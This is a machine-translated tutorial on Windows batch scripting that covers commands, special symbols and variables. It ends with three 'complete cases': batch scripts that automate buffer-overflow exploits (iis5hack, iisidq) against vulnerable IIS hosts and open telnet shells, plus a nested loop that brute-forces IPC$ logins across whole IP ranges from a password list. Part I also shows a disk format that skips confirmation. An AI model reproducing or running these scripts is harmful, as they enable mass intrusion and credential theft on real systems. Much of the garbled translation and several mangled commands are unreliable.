Batch learning tutorial


Part I: special commands for batch processing

Batch file is a set of commands in a certain order into an executable text file with the extension bat. These commands are collectively referred to as batch commands. Now I will introduce the batch commands to you.

1、 REM

Rem is a comment command that is generally used to annotate a program. The content after the command will not be displayed and executed when the program is executed. Example:
REM what you see now is the annotation. This sentence will not be executed. In the later examples, REM will be put after rem. Please pay attention.


Echo is a echo command with main parameters of off and on. Generally, echo message is used to display a specific message. Example:
Echo off
REM above means that the command executed will not be displayed when echo is turned off
Echo, this is the message.
“This is the message” column is displayed for REM above
Execution result:
This is the news.


Goto means jump. In batch processing, it is allowed to build a label with “: XXX” and then use goto: label to directly execute the command after label. example
Rem is labeled label.
REM continues to execute the above procedure at the label.


The CALL command can call another batch during batch execution and continue execution of the original batch when the other batch is executed. Example:
Batch 2. Bat contents are as follows:
Echo, that’s what 2 is about
Batch 1. Bat contents are as follows:
Echo, this is the content of 1
The contents of echo 1 and echo 2 are all displayed
The results are as follows:
This is the content of 1
That’s what 2 is about
All contents of 1 and 2 are displayed


Pause stops the execution of the system command and displays the following. Example:
Please press any key to continue

6、 IF

If condition judgment statement, the syntax format is as follows:
IF [NOT] ERRORLEVEL number command
IF [NOT] string1==string2 command
IF [NOT] EXIST filename command
[not] reverses the returned result, i.e. “if not”.
Errorlevel is the exit value returned after the command is executed
The numeric value range of number exit value is 0-255. The order of time value should be large to small. The condition holds when the returned value is greater than or equal to the specified value.
String1==string2 string1 and string2 are character data. The case of English characters will be regarded as different. The equal sign in this condition must be 2 (absolutely equal). If the condition wants to wait, the subsequent command will be executed
Exist filename means that a file or directory exists.
If errorlevel must be placed after a command. After executing the command, if errorlevel will judge the return value of the command.

1、 IF [NOT] ERRORLEVEL number command
Check the return value after the command is executed to make a judgment.
echo off
dir z:
REM if the exit code is 1 (unsuccessful), skip to Title 1 for execution
REM if the exit code is 0 (successful), skip to the title 0 for execution
Echo command executed successfully!
When the REM program finishes executing, skip to the title exit to exit
goto exit
Echo command execution failed!
When the REM program finishes executing, skip to the title exit to exit
goto exit
Rem, this is the exit of the program
2、 IF string1==string2 command
Check the value of the current variable to make a judgment
IF %1==2 goto no
Echo variables are equal!
Goto exit
Echo variable is not equal
goto exit
You can see the effect C as follows: test.bat number

3、 IF [NOT] EXIST filename command
Find specific documents and make judgment
echo off
IF not EXIST autoexec.bat goto 1
Echo file exists successfully!
goto exit
Echo file does not exist failed!
goto exit
This batch processing can be executed on Disk C and disk D respectively to see the effect.
7、 FOR
For is a special command to execute the command in a loop. At the same time, for can be applied in the loop of for. In this article, we will introduce the basic usage instead of the cycle of applying. Later, we will explain the cycle of applying. In batch processing, the command for is as follows:
FOR [%%c] IN (set) DO [command] [arguments]
The commands on the command line are as follows:
FOR [%c] IN (set) DO [command] [arguments]
Common parameters:
/L this set represents a sequence of numbers in incremental form from start to end. Therefore, (1,1,5) will generate sequence 1 23 4 5, (5, – 1,1) will generate sequence (5 43 2 1).
/D if the set contains wildcards, specifies to match the directory name, not the file name.

/F reads data from the specified file as a variable
EOL = C – refers to the end of a line comment character (just one)
Skip = n – number of lines ignored at the beginning of the file.
Delims = XXX – refers to the separator set. This replaces the default separator set for spaces and tabs.
Tokens = x, y, M-N – which symbol of each line is passed to the for itself of each iteration. This results in the assignment of additional variable names. The M-N format is a range. Mth is specified by the nth symbol. If the last character in the symbol string is an asterisk, additional variables are allocated and accept the reserved text of the line after the last symbol is parsed.
Usebackq – specifies that the new syntax is used in the case of a string that is executed as a command with a back quote and a single quote character as a text string command and allows double quotes to be used in filenameset to enclose the file name.
Here is an example:
FOR /F “eol=; tokens=2,3* delims=, ” %i in (myfile.txt) do @echo %i %j %k
Each line in myfile.txt is parsed, and lines starting with semicolons are ignored. The second and third symbols in each line are passed to the for program body; the symbols are delimited with commas and / or spaces. Note that this for body statement references% I for the second symbol,% J for the third symbol, and% k for all remaining symbols after the third symbol. For filenames with spaces, you need to enclose the filename in double quotes. In order to use double quotes in this way, you also need to use the usebackq option, otherwise double quotes are understood to be used to define a string to analyze.
%I was specifically described in the for statement,% J and% K were specifically described through the tokens = option. You can specify up to 26 symbols on a line with tokens = as long as you do not attempt to specify a variable higher than the letter ‘Z’ or ‘Z’. Keep in mind that for variable names are case sensitive and are universal; in addition, no more than 52 variables can be used at the same time.
You can also use for / F analysis logic on adjacent strings by enclosing the filenameset between the brackets in single quotes. In this way, the string is treated as a single input line in a file. Finally, you can use the for / F command to analyze the output of the command. The method is to change the filenameset between the brackets into an anti enclosing string. The string is passed as a command line to a child cmd.exe, and its output is grabbed into memory and analyzed as a file. So, here’s an example:
FOR /F “usebackq delims==” %i IN (`set`) DO @echo %i
Enumerates the environment variable names in the current environment.
Here is a simple example that will show the difference between a parameter / L and no parameter:
Delete file 1.txt 2.txt 3.txt 4.txt 5.txt
FOR /L %%F IN (1,1,5) DO DEL %%F.TXT
FOR %%F IN (1,2,3,4,5) DO DEL %%F.TXT
The results of the above two commands are the same as follows:

Start localization of environment changes in batch files. After SETLOCAL
The environment changes are limited to batch files. To restore the original settings, you must
Line endlocal. At the end of a batch file, for each
The SETLOCAL command that has not been executed will have an implied endlocal
Execution. Example:
Set path / * view environment variable path
Set path = e: \ tools / * reset environment variable path
From the above example, we can see that the environment variable path is the system default path when it is displayed for the first time. After it is set to e: \ tools, it will be displayed as e: \ tools, but after endlocal, we can see that it is restored to the default path of the system. But this setting only works when the batch is running. When the batch run completes, the environment variable path will be restored.

The shift command allows commands on the command to use more than 10 replaceable parameters (0 to% 9):
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
The results are as follows:
C::\>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11
1 2 3 4 5 6 7 8 9
2 3 4 5 6 7 8 9 10
3 4 5 6 7 8 9 10 11
The above is based on nine batch commands under WIN2000.

Part two: special symbols and batch processing

Some symbols are not allowed on the command line, but some have special meanings.
1. Symbol (@)
@In batch processing, it means to turn off echo of the current row. We know from the above that with the command echo off, we can turn off the echo of the whole batch, but we can’t do without the echo off command. Now we add @ before this command, so echo off is turned off by @ so that all commands do not respond
2. Symbols (>
>Means to pass and cover. His function is to pass the echo result after running to the following scope (the file can also be the default system console after that). For example:
The contents of file 1.txt are:
Use the command C: \ > dir *. TXT > 1.txt
At this time, the contents of 1.txt are as follows
The volume in drive C does not have a label.
The serial number of the volume is 301a-1508
C: Contents of
2003-03-11 14:04 1,005 FRUNLOG.TXT
2003-04-04 16:38 18,598,494 log.txt
2003-04-04 17:02 5 1.txt
2003-03-12 11:43 0 aierrorlog.txt
2003-03-30 00:35 30,571 202.108.txt
5 files 18630070 bytes
0 directory 1191542784 free bytes
>Overwrites the original file contents with the results of command execution.
When passed to the console, the program will not have any echo (Note: echo here is not the same concept as echo off. Echo off turns off the echo of the input command. The echo here is the echo during or after the program execution)
C:\>dir *.txt >nul
The program will have no display and no trace.
3. Symbols (> >
The function of the symbol > > is similar to that of the symbol >, but the difference is that the > > is passed and the > > is appended at the end of the file, and the echo can also be passed to the console (use the same as above) for example:
The same in file 1.txt:
Use the command C: \ > dir *. TXT > > 1.txt
At this time, the contents of 1.txt are as follows
The volume in drive C does not have a label.
The serial number of the volume is 301a-1508
C: Contents of
2003-03-11 14:04 1,005 FRUNLOG.TXT
2003-04-04 16:38 18,598,494 log.txt
2003-04-04 17:02 5 1.txt
2003-03-12 11:43 0 aierrorlog.txt
2003-03-30 00:35 30,571 202.108.txt
5 files 18630070 bytes
0 directory 1191542784 free bytes
>>The result of the command execution is overwritten with the original file content.
4. Symbol (|)
|A pipeline transfer command means to transfer the execution result of the previous command to the next command for processing. Example:
C:\>dir c:\|find “1508”
The serial number of the volume is 301a-1508
The above command means to find all of C: \ and find the 1508 string. Please use find /? To check the usage of find
This is how I format disks without using the format auto format parameter
echo y|fornat a: /s /q /v:system
Anyone who has used the format command knows that format has an interactive pairing process. The user is required to enter y to determine whether the current command is executed. Add echo y in front of this command and pass the result y of echo execution to format with the pipeline transmission character| (this command is dangerous, please be careful when testing)
5. Symbol (^)
^Is the leading character for the special symbols >, <, &. In the command, he removed the special kinetic energy of the above three symbols and only regarded them as symbols instead of using their special meanings. Example:
c:\>echo test ^> 1.txt
test > 1.txt
It can be seen from the above that instead of writing test to the file 1.txt, test > 1.txt is displayed as a string. This symbol works well when building batches remotely.
6. Sign (&)
&The symbol allows more than two different commands to be used on one line. If the first command fails to execute, the execution of the second command will not be affected. Example:
c:\> dir z:\ &dir y:\ &dir c:\
The above command will continuously display the contents of Z: Y: C: drive regardless of whether the drive letter exists.
7. & &)
&&Symbols also allow more than two different commands to be used in a line. When the first command fails to execute, subsequent commands will not be executed. Example:
c:\> dir z:\ &&dir y:\ &&dir c:\
The above command will prompt you to check whether there is a Z: disk. If there is a Z: disk, execute it. If not, stop executing all subsequent commands
8. Symbol (“”)
The ” symbol allows spaces in strings. Access to a special directory can be used as follows:
c:\>cd “Program Files”
c:\>cd progra~1
c:\>cd pro*
All the above methods can enter the program files directory
9. Symbol (,)
, the symbol is equivalent to a space. In some special cases, you can use instead of spaces. Example:
10. Symbols (;)
; symbol can be used for different targets when the commands are the same; it is isolated but the execution effect is the same. If an error occurs during execution, only the error report will be returned, but the program will continue to execute. Example:
DIR C:\;D:\;E:\F:\
The above command is equivalent to
Of course, there are some special symbols, but their scope of use is very small, so I will not explain them here one by one.

Part three: batch processing and variables

A proper reference to variables in batch processing will make your program more widely used. Batch processing can process 10 variables from% 0 to% 9 at a time. Where% 0 is used by default for batch file names. % 0 cannot be replaced by% 1 until you use the shift command. If you add an additional% 0 to% 1, the result is as follows:
C::\>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11
SHIFT.BAT 1 2 3 4 5 6 7 8 9
1 2 3 4 5 6 7 8 9 10
2 3 4 5 6 7 8 9 10 11
How does the system distinguish each variable? The system distinguishes variables according to the space in the middle of the string. That is to say, as long as a space is found, the character before the space is regarded as one variable while the character after the space is regarded as another variable. If your variable is a long directory name with spaces in it, you need to circle it with the quotes used in the special symbol 8 in the previous section. Example:
Batch processing contents are:
Enter command:
C:\>TEST “Program Files” Program Files
Program Files
In a complex batch process, more than 10 variables may be used at the same time, which will conflict with the rules of the system. How to solve this problem? There is also a variable called environment variable in the system (you can view the environment variable of the current system by using set command), such as the current system directory is% windir% or% systemroot%. When more than 10 parameters are used at the same time, we can save some variables to be called in later programs as environment variables. For specific usage, such as set a =% 1, we have named a new environment variable a, which needs to be called% a% when calling variable a. the environment variable is not affected by the shift command. If you want to change an environment variable, you need to reset it to change it. Of course, we can also transfer variables to achieve the goal. Let’s take an example. Batch processing is as follows:
ECHO %PASS% %PASS1% %1 %2 %3 %4 %5 %6 %7 %8 %9
Pass of set pass =% pass% variable
Use command: C: \ > test a B 3 4 5 6 7 8 9 10 K L
A B 3 4 5 6 7 8 9 10 K note: this line shows 11 variables
A B L% 9 becomes L after 3 shifts
The result of passing B L variable

Part IV: complete case

These are some of the uses of batch processing. Now let’s combine these usages and analyze some batch processes published on the Internet in detail to see how they work. Here I will give three examples to analyze in detail, and my comments will be added after / * in order to keep the program complete.
Example 1
This example is to use iis5hack.exe to batch overflow the host with. Printer vulnerability. The programs used are iis5hack.exe and telnet.exe. The command format of iis5hack is:
The 10 numbers of iis5hack < target IP > < target port > < target version > < overflow connection port > target version 0-9 correspond to different language versions and system versions of SP respectively. The command format we prepared for batch processing is < iis.bat target IP (start version number) > start version number is optional. The procedure is as follows.
@Echo off / * turn off command echo
If% 1% “= =” “goto help / * judge whether% 1 is empty and% 1 is the target IP
If “% 2%” = = “1” goto 1 / * judge whether% 2 is 1, if it is 1, jump flag 1
If “% 2%” = = “2” goto 2 / *% 2 is the start version number, if not set
If “% 2%” = = “3” goto 3 / * if it exists, execute from the matching place
if “%2%”==”4” goto 4
if “%2%”==”5” goto 5
if “%2%”==”6” goto 6
if “%2%”==”7” goto 7
if “%2%”==”8” goto 8
If not exist iis5hack.exe goto file / * if iis5hack.exe is not found, the content of the flag file segment will be executed
Ping% 1 – N 1 | find “received = 1” / * Ping the target 1 time, found received = 1 from the result
If errorlevel 1 goto error / * if the return code is 1, execute the error section (code 1: no discovery 0: discovery and successful execution)
Iis5hack% 1 80 9 88 | find “good” / * start overflow target port 80 system code 9 overflow connect port 88 find string “good” in execution result (string good will be found only after overflow succeeds)
If not errorlevel 1 goto telnet / * execute the contents of the telnet segment without error code 1 (overflow succeeded).
Echo operating system type 9 failed! / otherwise, this sentence will be displayed
: 8 / * refer to the above for the following code content
iis5hack %1 80 8 88 | find “good”
if not errorlevel 1 goto telnet
Echo operating system type 8 failed!
iis5hack %1 80 7 88 | find “good”
if not errorlevel 1 goto telnet
Echo operating system type 7 failed!
iis5hack %1 80 6 88 | find “good”
if not errorlevel 1 goto telnet
Echo operating system type 6 failed!
iis5hack %1 80 5 88 | find “good”
if not errorlevel 1 goto telnet
Echo operating system type 5 failed!
iis5hack %1 80 4 88 | find “good”
if not errorlevel 1 goto telnet
Echo operating system type 4 failed!
iis5hack %1 80 3 88 | find “good”
if not errorlevel 1 goto telnet
Echo operating system type 3 failed!
iis5hack %1 80 2 88 | find “good”
if not errorlevel 1 goto telnet
Echo operating system type 2 failed!
iis5hack %1 80 1 88 | find “good”
if not errorlevel 1 goto telnet
Echo operating system type 1 failed!
iis5hack %1 80 0 88 | find “good”
if not errorlevel 1 goto telnet
Echo operating system type 0 failed!
goto error
Telnet% 1 88 / * start connecting to port 88 of the destination IP
Goto exit / * jump to exit section after connection interruption
The: error / * error section displays help after an error
Echo may not be able to connect to the network or the other party can fix the vulnerability! Please try it manually in the following format!
Echo iis5hack [target IP] [web port] [system type] [open port]
Echo Chinese: 0
Echo Chinese + SP1: 1
Echo English: 2
Echo English + SP1: 3
Echo Japanese: 4
Echo Japanese + SP1: 5
Echo Korean: 6
Echo Korean + SP1: 7
Echo Mexican: 8
Echo Mexican + SP1: 9
Goto exit / * jump to exit section
The: file / * file section displays information not found in the file
Echo file iis5hack.exe is not found! The program stops running!
Goto exit / * jump to exit section
The: help / * help section displays help on the format used for this batch
Echo this procedure is used as follows:
Echo IIS [target IP]
Echo IIS [target IP] [starting number 9-0]
: exit / * exit segment is program exit
This batch process basically has no cycles but goes all the way. So the code is relatively long and difficult!
Example two
This example uses iisidq.exe to batch overflow IDq vulnerable machines. The programs used are iisidq.exe and telnet.exe. The usage of iisidq.exe is as follows:
Operating parameters: operating system type destination address web port 1 overflow listening port < input command 1 >
Where, if the input command parameter is not entered, the default is: “cmd.exe”.
Where the code range for the operating system type type is 0-14. The command format used in batch processing is < IDq. Bat target IP > program as follows:
@Echo off / * same example 1
If not exist iisidq.exe goto file / * the same example
If% 1 = = “” goto error / * same example
Ping% 1 – N 1 | find “received = 1” / * same example
If errorlevel 1 goto error1 / * the same example
Set B =% 1 / * creates an environment variable B, passing the contents of variable% 1 to environment variable B. The content of variable B will be the target IP in the future
Set a = 0 / * creates an environment variable a and specifies that the environment variable a is 0. A is used as the counter because the entire batch loop is used.
: no / * no segment start
If% a% = = 0 set D = 0 / * if environment variable a = 0, create environment variable D and set environment variable d = 0.
If% a% = = 1 set D = 1 / * environment variable D is actually operating system type code, which is controlled by counter
If% a% = = 2 set D = 2 / * change.
if %a%==3 set d=3
if %a%==4 set d=4
if %a%==5 set d=5
if %a%==6 set d=6
if %a%==7 set d=7
if %a%==9 set d=9
if %a%==10 set d=13
if %a%==11 set d=14
Goto 0 / * run at flag 0 after variable passing
Echo is executing item% d% and cannot connect to target% B%. Please wait while trying to connect
: 0 / * flag 0 start
Iisidq% d%% B% 80 1 99 | find “good” / * send the overflow command in the format and find the string good in the result
If errorlevel 1 good to 1 / * if there is no good string, no hop is sent
/*Continue to try to send at transfer flag 1
Ping – N 8 > nul / * Ping yourself 8 times is equivalent to delaying 8 seconds without displaying execution
* results
Echo executing item% d! / * reports the type of operating system being overflowed
Telnet% B% 99 / * connection overflow port
Echo. / * show a blank line
If% d% = = 14 goto error1 / * jump to error1 if the operating system type is 14 (loop exit)
If% d% = = 13 set a = 11 / * start to reattach the operating system code with a counter
if %d%==9 set a=10
if %d%==7 set a=9
if %d%==6 set a=7
if %d%==5 set a=6
if %d%==4 set a=5
if %d%==3 set a=4
if %d%==2 set a=3
if %d%==1 set a=2
if %d%==0 set a=1
Goto no / * add value to complete jump to no segment execution
: file / * the following are the help tips after the error
Echo iisidq.exe was not found! Put this file and this file in the same directory!
goto exit
Echo error! Target IP is not recognized! Please use the following format to connect!
Echo IDq [target IP]
goto exit
Echo connection failed! Maybe the target machine has fixed the vulnerability or network fault!
Echo please try it manually in the following format!
Echo iisidq [target type] [target IP] [target port] [connection method] [overflow port]
Echo telnet [target IP] [overflow port]
: exit / * exit of the entire program
This batch processing uses the whole cycle to master the counter part to master this batch processing.
Example three
for /l %%a in (0,1,255) do for /l %%b in (0,1,255) do for /l %%c in (1,1,254) do for /f “tokens=1,2*” %%e in (userpass.txt) do net use \\%1.%%a.%%b.%%c\ipc$ %%e /u:%%f
The above command is 1 command. You can see that the command uses four for to apply. Usage: C: \ > test.bat 218 after entering 218, the command will take the initial value 0 of the first for as%% a and then continue to take the initial value 0 of the second for as%% B and continue to take the initial value 1 of the third for as%% C the last for is to take the first character in userpass.txt as the password%% e the second character as the user name%% F and finally execute the command (here I will take the above values in and set the password 123 user name is ABC)
net usr \\\ipc$ 123 /u:abc
Of course, some friends may say that the above example is too simple and inflexible. I’ve made some changes to this example (see disc IPC. Bat for the complete file) so that interested friends can see it for themselves. The modified program can flexibly find the range from the beginning to the end specified by you or from the beginning to the maximum IP specified by you. Of course, the function can also be strengthened. As for the extent to which it can be strengthened, it’s up to you whether it can become a new tool.
The loop action is a little too big. It’s mainly the trouble of IP digital replacement, so there’s no way. I will not write comments for this batch. Please refer to the above content carefully and you will understand this batch soon. Don’t say it is easy to understand! At least this is a batch process that can detect and save weak passwords without using any third-party tools!! A simple change is still very destructive. The biggest advantage of the above batch processing under WIN2000 and XP is that there is only one batch file and there is no false alarm. The disadvantage is too long

PS: it’s better not to learn this before learning programming. Although it doesn’t belong to programming, it has the idea of programming.